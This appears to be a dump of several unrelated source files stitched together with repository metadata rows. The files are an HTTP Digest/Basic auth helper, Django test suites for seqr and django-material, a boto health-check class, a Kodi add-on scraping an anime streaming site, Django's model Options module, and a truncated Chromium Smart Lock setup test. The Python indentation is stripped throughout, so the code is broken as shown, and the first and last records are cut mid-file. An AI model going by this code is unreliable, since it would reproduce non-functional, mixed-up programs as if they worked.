elif authMethod.lower() == 'digest':
for n,v in map(lambda x: x.strip().split('='), rest.split(',') if rest else []):
ch[n.lower().strip()] = _unquote(v.strip())
# TODO: doesn't work if embedded ',' in value, e.g., qop="auth,auth-int"
# @implements RFC2617 P8L3-P8L25
for y in filter(lambda x: x in ch, ['username', 'realm', 'nonce', 'opaque', 'algorithm']):
cr[y] = ch[y]
cr['uri'] = uri
cr['httpMethod'] = method
if 'qop' in ch:
if context and 'cnonce' in context:
cnonce, nc = context['cnonce'], context['nc'] + 1
else:
cnonce, nc = H(str(randint(0, 2**31))), 1
if context:
context['cnonce'], context['nc'] = cnonce, nc
cr['qop'], cr['cnonce'], cr['nc'] = 'auth', cnonce, '%08x'% nc
# @implements RFC2617 P11L11-P11L30
cr['response'] = digest(cr)
items = sorted(filter(lambda x: x not in ['name', 'authMethod', 'value', 'httpMethod', 'entityBody', 'password'], cr))
return authMethod + ' ' + ','.join(map(lambda y: '%s=%s'%(y, (cr[y] if y == 'qop' or y == 'nc' else _quote(cr[y]))), items))
else:
raise ValueError, 'Invalid auth method -- ' + authMethod
# @implements RFC2617 P10L19-P10L33
H = lambda d: md5(d).hexdigest()
KD = lambda s, d: H(s + ':' + d)
# @implements RFC2617 P18L34-P19L9
def digest(cr):
'''Create a digest response for the credentials.
>>> input = {'httpMethod':'GET', 'username':'Mufasa', 'password': 'Circle Of Life', 'realm':'[email protected]', 'algorithm':'md5', 'nonce':'dcd98b7102dd2f0e8b11d0f600bfb0c093', 'uri':'/dir/index.html', 'qop':'auth', 'nc': '00000001', 'cnonce':'0a4f113b', 'opaque':'5ccc069c403ebaf9f0171e9517f40e41'}
>>> print digest(input)
"6629fae49393a05397450978507c4ef1"
'''
algorithm, username, realm, password, nonce, cnonce, nc, qop, httpMethod, uri, entityBody \
= map(lambda x: cr[x] if x in cr else None, ['algorithm', 'username', 'realm', 'password', 'nonce', 'cnonce', 'nc', 'qop', 'httpMethod', 'uri', 'entityBody'])
# @implements RFC2617 P13L26-P13L45
if algorithm and algorithm.lower() == 'md5-sess':
A1 = H(username + ':' + realm + ':' + password) + ':' + nonce + ':' + cnonce
else:
A1 = username + ':' + realm + ':' + password
# @implements RFC2617 P14L10-P14L17
if not qop or qop == 'auth':
A2 = httpMethod + ':' + str(uri)
else:
A2 = httpMethod + ':' + str(uri) + ':' + H(str(entityBody))
# @implements RFC2617 P13L6-P13L20
if qop and (qop == 'auth' or qop == 'auth-int'):
a = nonce + ':' + str(nc) + ':' + cnonce + ':' + qop + ':' + A2
return _quote(KD(H(A1), nonce + ':' + str(nc) + ':' + cnonce + ':' + qop + ':' + H(A2)))
else:
return _quote(KD(H(A1), nonce + ':' + H(A2)))
# @implements RFC2617 P6L8-P6L11
def basic(cr):
'''Create a basic response for the credentials.
>>> print basic({'username':'Aladdin', 'password':'open sesame'})
QWxhZGRpbjpvcGVuIHNlc2FtZQ==
'''
# @implements RFC2617 P5L43-P6L6
return b64encode(cr['username'] + ':' + cr['password'])
if __name__ == '__main__':
import doctest
doctest.testmod() | gpl-2.0 | 2,026,771,447,023,723,000 | 49.613636 | 305 | 0.606519 | false |
macarthur-lab/xbrowse | seqr/views/apis/gene_api_tests.py | 1 | 3060 | import json
from django.test import TransactionTestCase
from django.urls.base import reverse
from seqr.models import GeneNote
from seqr.views.apis.gene_api import gene_info, create_gene_note_handler, update_gene_note_handler, delete_gene_note_handler
from seqr.views.utils.test_utils import _check_login
GENE_ID = 'ENSG00000223972'
class GeneAPITest(TransactionTestCase):
fixtures = ['users', 'reference_data']
def test_gene_info(self):
url = reverse(gene_info, args=[GENE_ID])
_check_login(self, url)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
gene = response.json()['genesById'][GENE_ID]
self.assertSetEqual(set(gene.keys()), {
'chromGrch37', 'chromGrch38', 'codingRegionSizeGrch37', 'codingRegionSizeGrch38', 'constraints',
'diseaseDesc', 'endGrch37', 'endGrch38', 'functionDesc', 'gencodeGeneType', 'geneId', 'geneSymbol',
'omimPhenotypes', 'mimNumber', 'startGrch37', 'startGrch38', 'notes', 'mgiMarkerId', 'geneNames',
})
def test_create_update_and_delete_gene_note(self):
create_gene_note_url = reverse(create_gene_note_handler, args=[GENE_ID])
_check_login(self, create_gene_note_url)
# send valid request to create gene_note
response = self.client.post(create_gene_note_url, content_type='application/json', data=json.dumps(
{'note': 'new_gene_note'}
))
self.assertEqual(response.status_code, 200)
new_note_response = response.json()['genesById'][GENE_ID]['notes'][0]
self.assertEqual(new_note_response['note'], 'new_gene_note')
new_gene_note = GeneNote.objects.filter(guid=new_note_response['noteGuid']).first()
self.assertIsNotNone(new_gene_note)
self.assertEqual(new_gene_note.note, new_note_response['note'])
# update the gene_note
update_gene_note_url = reverse(update_gene_note_handler, args=[GENE_ID, new_gene_note.guid])
response = self.client.post(update_gene_note_url, content_type='application/json', data=json.dumps(
{'note': 'updated_gene_note'}))
self.assertEqual(response.status_code, 200)
updated_note_response = response.json()['genesById'][GENE_ID]['notes'][0]
self.assertEqual(updated_note_response['note'], 'updated_gene_note')
updated_gene_note = GeneNote.objects.filter(guid=updated_note_response['noteGuid']).first()
self.assertIsNotNone(updated_gene_note)
self.assertEqual(updated_gene_note.note, updated_note_response['note'])
# delete the gene_note
delete_gene_note_url = reverse(delete_gene_note_handler, args=[GENE_ID, updated_gene_note.guid])
response = self.client.post(delete_gene_note_url, content_type='application/json')
self.assertEqual(response.status_code, 200)
# check that gene_note was deleted
new_gene_note = GeneNote.objects.filter(guid=updated_note_response['noteGuid'])
self.assertEqual(len(new_gene_note), 0)
| agpl-3.0 | 2,172,696,810,965,846,300 | 43.347826 | 124 | 0.673203 | false |
barseghyanartur/django-material | tests/integration/tests/test_textinput.py | 10 | 4970 | import json
from django import forms
from django_webtest import WebTest
from . import build_test_urls
class TextInputForm(forms.Form):
test_field = forms.CharField(
min_length=5,
max_length=20,
widget=forms.TextInput(attrs={'data-test': 'Test Attr'}))
class TestTextInput(WebTest):
default_form = TextInputForm
urls = 'tests.integration.tests.test_textinput'
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field"', page.body.decode('utf-8'))
self.assertIn('maxlength="20"', page.body.decode('utf-8'))
self.assertIn('data-test="Test Attr"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field', form.fields)
form['test_field'] = 'TEST CONTENT'
response = json.loads(form.submit().body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEquals('TEST CONTENT', response['cleaned_data']['test_field'])
def test_missing_value_error(self):
form = self.app.get(self.test_missing_value_error.url).form
response = form.submit()
self.assertIn('has-error', response.body.decode('utf-8'))
self.assertIn('This field is required.', response.body.decode('utf-8'))
def test_render_with_value(self):
form = self.app.get(self.test_render_with_value.url).form
form['test_field'] = 'a'*21
response = form.submit()
self.assertIn('value="{}"'.format('a'*21), response.body.decode('utf-8'))
self.assertIn('Ensure this value has at most 20 characters', response.body.decode('utf-8'))
def test_part_group_class(self):
page = self.app.get(self.test_part_group_class.url)
self.assertIn('class="input-field col s12 yellow"', page.body.decode('utf-8'))
test_part_group_class.template = '''
{% form %}
{% part form.test_field group_class %}input-field col s12 yellow{% endpart %}
{% endform %}
'''
def test_part_add_group_class(self):
page = self.app.get(self.test_part_add_group_class.url)
self.assertIn('class="input-field col s12 required deep-purple lighten-5"', page.body.decode('utf-8'))
test_part_add_group_class.template = '''
{% form %}
{% part form.test_field add_group_class %}deep-purple lighten-5{% endpart %}
{% endform %}
'''
def test_part_prefix(self):
response = self.app.get(self.test_part_prefix.url)
self.assertIn('<i class="mdi-communication-email prefix"></i>', response.body.decode('utf-8'))
test_part_prefix.template = '''
{% form %}
{% part form.test_field prefix %}<i class="mdi-communication-email prefix"></i>{% endpart %}
{% endform %}
'''
def test_part_add_control_class(self):
response = self.app.get(self.test_part_add_control_class.url)
self.assertIn('class="orange"', response.body.decode('utf-8'))
test_part_add_control_class.template = '''
{% form %}
{% part form.test_field add_control_class %}orange{% endpart %}
{% endform %}
'''
def test_part_label(self):
response = self.app.get(self.test_part_label.url)
self.assertIn('<label for="id_test_field">My label</label>', response.body.decode('utf-8'))
test_part_label.template = '''
{% form %}
{% part form.test_field label %}<label for="id_test_field">My label</label>{% endpart %}
{% endform %}
'''
def test_part_add_label_class(self):
response = self.app.get(self.test_part_add_label_class.url)
self.assertIn('<label for="id_test_field" class="green-text">Test field</label>', response.body.decode('utf-8'))
test_part_add_label_class.template = '''
{% form %}
{% part form.test_field add_label_class %}green-text{% endpart %}
{% endform %}
'''
def test_part_help_text(self):
response = self.app.get(self.test_part_help_text.url)
self.assertIn('<small class="help-block">My help</small>', response.body.decode('utf-8'))
test_part_help_text.template = '''
{% form %}
{% part form.test_field help_text %}<small class="help-block">My help</small>{% endpart %}
{% endform %}
'''
def test_part_errors(self):
response = self.app.get(self.test_part_errors.url)
self.assertIn('<div class="errors"><small class="error">My Error</small></div>', response.body.decode('utf-8'))
test_part_errors.template = '''
{% form %}
{% part form.test_field errors%}<div class="errors"><small class="error">My Error</small></div>{% endpart %}
{% endform %}
'''
urlpatterns = build_test_urls(TestTextInput)
| bsd-3-clause | 3,600,718,790,823,478,000 | 36.089552 | 122 | 0.608853 | false |
linkedin/indextank-service | api/boto/ec2/elb/healthcheck.py | 11 | 2662 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class HealthCheck(object):
"""
Represents an EC2 Access Point Health Check
"""
def __init__(self, access_point=None, interval=30, target=None,
healthy_threshold=3, timeout=5, unhealthy_threshold=5):
self.access_point = access_point
self.interval = interval
self.target = target
self.healthy_threshold = healthy_threshold
self.timeout = timeout
self.unhealthy_threshold = unhealthy_threshold
def __repr__(self):
return 'HealthCheck:%s' % self.target
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Interval':
self.interval = int(value)
elif name == 'Target':
self.target = value
elif name == 'HealthyThreshold':
self.healthy_threshold = int(value)
elif name == 'Timeout':
self.timeout = int(value)
elif name == 'UnhealthyThreshold':
self.unhealthy_threshold = int(value)
else:
setattr(self, name, value)
def update(self):
if not self.access_point:
return
new_hc = self.connection.configure_health_check(self.access_point,
self)
self.interval = new_hc.interval
self.target = new_hc.target
self.healthy_threshold = new_hc.healthy_threshold
self.unhealthy_threshold = new_hc.unhealthy_threshold
self.timeout = new_hc.timeout
| apache-2.0 | 8,682,352,233,627,036,000 | 38.147059 | 74 | 0.661157 | false |
azumimuo/family-xbmc-addon | plugin.video.bubbles/resources/lib/sources/english/hoster/open/gogoanime.py | 1 | 3837 | # -*- coding: utf-8 -*-
'''
Bubbles Addon
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,json
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import directstream
from resources.lib.modules import source_utils
from resources.lib.modules import tvmaze
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.genre_filter = ['animation', 'anime']
self.domains = ['gogoanimemobile.com', 'gogoanimemobile.net', 'gogoanime.io']
self.base_link = 'http://ww1.gogoanime.io'
self.search_link = '/search.html?keyword=%s'
self.episode_link = '/%s-episode-%s'
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
tv_maze = tvmaze.tvMaze()
tvshowtitle = tv_maze.showLookup('thetvdb', tvdb)
tvshowtitle = tvshowtitle['name']
t = cleantitle.get(tvshowtitle)
q = urlparse.urljoin(self.base_link, self.search_link)
q = q % urllib.quote_plus(tvshowtitle)
r = client.request(q)
r = client.parseDOM(r, 'ul', attrs={'class': 'items'})
r = client.parseDOM(r, 'li')
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title'), re.findall('\d{4}', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][-1]) for i in r if i[0] and i[1] and i[2]]
r = [i for i in r if t == cleantitle.get(i[1]) and year == i[2]]
r = r[0][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
tv_maze = tvmaze.tvMaze()
num = tv_maze.episodeAbsoluteNumber(tvdb, int(season), int(episode))
url = [i for i in url.strip('/').split('/')][-1]
url = self.episode_link % (url, num)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = client.parseDOM(r, 'iframe', ret='src')
for u in r:
try:
if not u.startswith('http') and not 'vidstreaming' in u: raise Exception()
url = client.request(u)
url = client.parseDOM(url, 'source', ret='src')
for i in url:
try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'en', 'url': i, 'direct': True, 'debridonly': False})
except: pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return directstream.googlepass(url)
| gpl-2.0 | -2,185,568,075,376,425,700 | 31.794872 | 182 | 0.565546 | false |
hectord/lettuce | tests/integration/lib/Django-1.2.5/django/db/models/options.py | 43 | 19583 | import re
from bisect import bisect
from django.conf import settings
from django.db.models.related import RelatedObject
from django.db.models.fields.related import ManyToManyRel
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.proxy import OrderWrt
from django.db.models.loading import get_models, app_cache_ready
from django.utils.translation import activate, deactivate_all, get_language, string_concat
from django.utils.encoding import force_unicode, smart_str
from django.utils.datastructures import SortedDict
# Calculate the verbose_name by converting from InitialCaps to "lowercase with spaces".
get_verbose_name = lambda class_name: re.sub('(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', ' \\1', class_name).lower().strip()
DEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by',
'order_with_respect_to', 'app_label', 'db_tablespace',
'abstract', 'managed', 'proxy', 'auto_created')
class Options(object):
def __init__(self, meta, app_label=None):
self.local_fields, self.local_many_to_many = [], []
self.virtual_fields = []
self.module_name, self.verbose_name = None, None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self.unique_together = []
self.permissions = []
self.object_name, self.app_label = None, app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.admin = None
self.meta = meta
self.pk = None
self.has_auto_field, self.auto_field = False, None
self.abstract = False
self.managed = True
self.proxy = False
self.proxy_for_model = None
self.parents = SortedDict()
self.duplicate_targets = {}
self.auto_created = False
# To handle various inheritance situations, we need to track where
# managers came from (concrete or abstract base classes).
self.abstract_managers = []
self.concrete_managers = []
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.util import truncate_name
cls._meta = self
self.installed = re.sub('\.models$', '', cls.__module__) in settings.INSTALLED_APPS
# First, construct the default values for these options.
self.object_name = cls.__name__
self.module_name = self.object_name.lower()
self.verbose_name = get_verbose_name(self.object_name)
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
# unique_together can be either a tuple of tuples, or a single
# tuple of two strings. Normalize it to a tuple of tuples, so that
# calling code can uniformly expect that.
ut = meta_attrs.pop('unique_together', getattr(self, 'unique_together'))
if ut and not isinstance(ut[0], (tuple, list)):
ut = (ut,)
setattr(self, 'unique_together', ut)
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = string_concat(self.verbose_name, 's')
# Any leftover attributes must be invalid.
if meta_attrs != {}:
raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs.keys()))
else:
self.verbose_name_plural = string_concat(self.verbose_name, 's')
del self.meta
# If the db_table wasn't provided, use the app_label + module_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.module_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _prepare(self, model):
if self.order_with_respect_to:
self.order_with_respect_to = self.get_field(self.order_with_respect_to)
self.ordering = ('_order',)
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = self.parents.value_for_index(0)
field.primary_key = True
self.setup_pk(field)
else:
auto = AutoField(verbose_name='ID', primary_key=True,
auto_created=True)
model.add_to_class('id', auto)
# Determine any sets of fields that are pointing to the same targets
# (e.g. two ForeignKeys to the same remote model). The query
# construction code needs to know this. At the end of this,
# self.duplicate_targets will map each duplicate field column to the
# columns it duplicates.
collections = {}
for column, target in self.duplicate_targets.iteritems():
try:
collections[target].add(column)
except KeyError:
collections[target] = set([column])
self.duplicate_targets = {}
for elt in collections.itervalues():
if len(elt) == 1:
continue
for column in elt:
self.duplicate_targets[column] = elt.difference(set([column]))
def add_field(self, field):
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if field.rel and isinstance(field.rel, ManyToManyRel):
self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)
if hasattr(self, '_m2m_cache'):
del self._m2m_cache
else:
self.local_fields.insert(bisect(self.local_fields, field), field)
self.setup_pk(field)
if hasattr(self, '_field_cache'):
del self._field_cache
del self._field_name_cache
if hasattr(self, '_name_map'):
del self._name_map
def add_virtual_field(self, field):
self.virtual_fields.append(field)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Does the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return "%s.%s" % (smart_str(self.app_label), smart_str(self.module_name))
def verbose_name_raw(self):
"""
There are a few places where the untranslated verbose name is needed
(so that we get the same value regardless of currently active
locale).
"""
lang = get_language()
deactivate_all()
raw = force_unicode(self.verbose_name)
activate(lang)
return raw
verbose_name_raw = property(verbose_name_raw)
def _fields(self):
"""
The getter for self.fields. This returns the list of field objects
available to this model (including through parent models).
Callers are not permitted to modify this list, since it's a reference
to this instance (not a copy).
"""
try:
self._field_name_cache
except AttributeError:
self._fill_fields_cache()
return self._field_name_cache
fields = property(_fields)
def get_fields_with_model(self):
"""
Returns a sequence of (field, model) pairs for all fields. The "model"
element is None for fields on the current model. Mostly of use when
constructing queries so that we know which model a field belongs to.
"""
try:
self._field_cache
except AttributeError:
self._fill_fields_cache()
return self._field_cache
def _fill_fields_cache(self):
cache = []
for parent in self.parents:
for field, model in parent._meta.get_fields_with_model():
if model:
cache.append((field, model))
else:
cache.append((field, parent))
cache.extend([(f, None) for f in self.local_fields])
self._field_cache = tuple(cache)
self._field_name_cache = [x for x, _ in cache]
def _many_to_many(self):
try:
self._m2m_cache
except AttributeError:
self._fill_m2m_cache()
return self._m2m_cache.keys()
many_to_many = property(_many_to_many)
def get_m2m_with_model(self):
"""
The many-to-many version of get_fields_with_model().
"""
try:
self._m2m_cache
except AttributeError:
self._fill_m2m_cache()
return self._m2m_cache.items()
def _fill_m2m_cache(self):
cache = SortedDict()
for parent in self.parents:
for field, model in parent._meta.get_m2m_with_model():
if model:
cache[field] = model
else:
cache[field] = parent
for field in self.local_many_to_many:
cache[field] = None
self._m2m_cache = cache
def get_field(self, name, many_to_many=True):
"""
Returns the requested field by name. Raises FieldDoesNotExist on error.
"""
to_search = many_to_many and (self.fields + self.many_to_many) or self.fields
for f in to_search:
if f.name == name:
return f
raise FieldDoesNotExist('%s has no field named %r' % (self.object_name, name))
def get_field_by_name(self, name):
"""
Returns the (field_object, model, direct, m2m), where field_object is
the Field instance for the given name, model is the model containing
this field (None for local fields), direct is True if the field exists
on this model, and m2m is True for many-to-many relations. When
'direct' is False, 'field_object' is the corresponding RelatedObject
for this field (since the field doesn't have an instance associated
with it).
Uses a cache internally, so after the first access, this is very fast.
"""
try:
try:
return self._name_map[name]
except AttributeError:
cache = self.init_name_map()
return cache[name]
except KeyError:
raise FieldDoesNotExist('%s has no field named %r'
% (self.object_name, name))
def get_all_field_names(self):
"""
Returns a list of all field names that are possible for this model
(including reverse relation names). This is used for pretty printing
debugging output (a list of choices), so any internal-only field names
are not included.
"""
try:
cache = self._name_map
except AttributeError:
cache = self.init_name_map()
names = cache.keys()
names.sort()
# Internal-only names end with "+" (symmetrical m2m related names being
# the main example). Trim them.
return [val for val in names if not val.endswith('+')]
def init_name_map(self):
"""
Initialises the field name -> field object mapping.
"""
cache = {}
# We intentionally handle related m2m objects first so that symmetrical
# m2m accessor names can be overridden, if necessary.
for f, model in self.get_all_related_m2m_objects_with_model():
cache[f.field.related_query_name()] = (f, model, False, True)
for f, model in self.get_all_related_objects_with_model():
cache[f.field.related_query_name()] = (f, model, False, False)
for f, model in self.get_m2m_with_model():
cache[f.name] = (f, model, True, True)
for f, model in self.get_fields_with_model():
cache[f.name] = (f, model, True, False)
if app_cache_ready():
self._name_map = cache
return cache
def get_add_permission(self):
return 'add_%s' % self.object_name.lower()
def get_change_permission(self):
return 'change_%s' % self.object_name.lower()
def get_delete_permission(self):
return 'delete_%s' % self.object_name.lower()
def get_all_related_objects(self, local_only=False):
try:
self._related_objects_cache
except AttributeError:
self._fill_related_objects_cache()
if local_only:
return [k for k, v in self._related_objects_cache.items() if not v]
return self._related_objects_cache.keys()
def get_all_related_objects_with_model(self):
"""
Returns a list of (related-object, model) pairs. Similar to
get_fields_with_model().
"""
try:
self._related_objects_cache
except AttributeError:
self._fill_related_objects_cache()
return self._related_objects_cache.items()
def _fill_related_objects_cache(self):
cache = SortedDict()
parent_list = self.get_parent_list()
for parent in self.parents:
for obj, model in parent._meta.get_all_related_objects_with_model():
if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:
continue
if not model:
cache[obj] = parent
else:
cache[obj] = model
for klass in get_models():
for f in klass._meta.local_fields:
if f.rel and not isinstance(f.rel.to, str) and self == f.rel.to._meta:
cache[RelatedObject(f.rel.to, klass, f)] = None
self._related_objects_cache = cache
def get_all_related_many_to_many_objects(self, local_only=False):
try:
cache = self._related_many_to_many_cache
except AttributeError:
cache = self._fill_related_many_to_many_cache()
if local_only:
return [k for k, v in cache.items() if not v]
return cache.keys()
def get_all_related_m2m_objects_with_model(self):
"""
Returns a list of (related-m2m-object, model) pairs. Similar to
get_fields_with_model().
"""
try:
cache = self._related_many_to_many_cache
except AttributeError:
cache = self._fill_related_many_to_many_cache()
return cache.items()
def _fill_related_many_to_many_cache(self):
cache = SortedDict()
parent_list = self.get_parent_list()
for parent in self.parents:
for obj, model in parent._meta.get_all_related_m2m_objects_with_model():
if obj.field.creation_counter < 0 and obj.model not in parent_list:
continue
if not model:
cache[obj] = parent
else:
cache[obj] = model
for klass in get_models():
for f in klass._meta.local_many_to_many:
if f.rel and not isinstance(f.rel.to, str) and self == f.rel.to._meta:
cache[RelatedObject(f.rel.to, klass, f)] = None
if app_cache_ready():
self._related_many_to_many_cache = cache
return cache
def get_base_chain(self, model):
"""
Returns a list of parent classes leading to 'model' (order from closet
to most distant ancestor). This has to handle the case were 'model' is
a granparent or even more distant relation.
"""
if not self.parents:
return
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
raise TypeError('%r is not an ancestor of this model'
% model._meta.module_name)
def get_parent_list(self):
"""
Returns a list of all the ancestor of this model as a list. Useful for
determining if something is an ancestor, regardless of lineage.
"""
result = set()
for parent in self.parents:
result.add(parent)
result.update(parent._meta.get_parent_list())
return result
def get_ancestor_link(self, ancestor):
"""
Returns the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Returns None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
# In case of a proxied model, the first link
# of the chain to the ancestor is that parent
# links
return self.parents[parent] or parent_link
def get_ordered_objects(self):
"Returns a list of Options objects that are ordered with respect to this object."
if not hasattr(self, '_ordered_objects'):
objects = []
# TODO
#for klass in get_models(get_app(self.app_label)):
# opts = klass._meta
# if opts.order_with_respect_to and opts.order_with_respect_to.rel \
# and self == opts.order_with_respect_to.rel.to._meta:
# objects.append(opts)
self._ordered_objects = objects
return self._ordered_objects
def pk_index(self):
"""
Returns the index of the primary key field in the self.fields list.
"""
return self.fields.index(self.pk)
| gpl-3.0 | 5,512,299,899,066,825,000 | 39.047035 | 122 | 0.580759 | false |
darktears/chromium-crosswalk | components/proximity_auth/e2e_test/setup_test.py | 28 | 5738 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Script that exercises the Smart Lock setup flow, testing that a nearby phone
can be found and used to unlock a Chromebook.
Note: This script does not currently automate Android phones, so make sure that
a phone is properly configured and online before starting the test.
Usage:
python setup_test.py --remote_address REMOTE_ADDRESS
--username USERNAME
--password PASSWORD
[--app_path APP_PATH]
[--ssh_port SSH_PORT]
[--cryptauth_staging_url STAGING_URL]
If |--app_path| is provided, then a copy of the Smart Lock app on the local
machine will be used instead of the app on the ChromeOS device.
"""
import argparse
import cros
import cryptauth
import logging
import os
import subprocess
import sys
import tempfile
logger = logging.getLogger('proximity_auth.%s' % __name__)
class SmartLockSetupError(Exception):
pass
def pingable_address(address):
try:
subprocess.check_output(['ping', '-c', '1', '-W', '1', address])
except subprocess.CalledProcessError:
raise argparse.ArgumentError('%s cannot be reached.' % address)
return address
def email(arg):
tokens = arg.lower().split('@')
if len(tokens) != 2 or '.' not in tokens[1]:
raise argparse.ArgumentError('%s is not a valid email address' % arg)
name, domain = tokens
if domain == 'gmail.com':
name = name.replace('.', '')
return '@'.join([name, domain])
def directory(path):
if not os.path.isdir(path):
raise argparse.ArgumentError('%s is not a directory' % path)
return path
def ParseArgs():
parser = argparse.ArgumentParser(prog='python setup_test.py')
parser.add_argument('--remote_address', required=True, type=pingable_address)
parser.add_argument('--username', required=True, type=email)
parser.add_argument('--password', required=True)
parser.add_argument('--ssh_port', type=int)
parser.add_argument('--app_path', type=directory)
parser.add_argument('--cryptauth_staging_url', type=str)
args = parser.parse_args()
return args
def CheckCryptAuthState(access_token):
cryptauth_client = cryptauth.CryptAuthClient(access_token)
# Check if we can make CryptAuth requests.
if cryptauth_client.GetMyDevices() is None:
logger.error('Cannot reach CryptAuth on test machine.')
return False
if cryptauth_client.GetUnlockKey() is not None:
logger.info('Smart Lock currently enabled, turning off on Cryptauth...')
if not cryptauth_client.ToggleEasyUnlock(False):
logger.error('ToggleEasyUnlock request failed.')
return False
result = cryptauth_client.FindEligibleUnlockDevices()
if result is None:
logger.error('FindEligibleUnlockDevices request failed')
return False
eligibleDevices, _ = result
if len(eligibleDevices) == 0:
logger.warn('No eligible phones found, trying to ping phones...')
result = cryptauth_client.PingPhones()
if result is None or not len(result[0]):
logger.error('Pinging phones failed :(')
return False
else:
logger.info('Pinging phones succeeded!')
else:
logger.info('Found eligible device: %s' % (
eligibleDevices[0]['friendlyDeviceName']))
return True
def _NavigateSetupDialog(chromeos, app):
logger.info('Scanning for nearby phones...')
btmon = chromeos.RunBtmon()
find_phone_success = app.FindPhone()
btmon.terminate()
if not find_phone_success:
fd, filepath = tempfile.mkstemp(prefix='btmon-')
os.write(fd, btmon.stdout.read())
os.close(fd)
logger.info('Logs for btmon can be found at %s' % filepath)
raise SmartLockSetupError("Failed to find nearby phone.")
logger.info('Phone found! Starting pairing...')
if not app.PairPhone():
raise SmartLockSetupError("Failed to pair with phone.")
logger.info('Pairing success! Starting trial run...')
app.StartTrialRun()
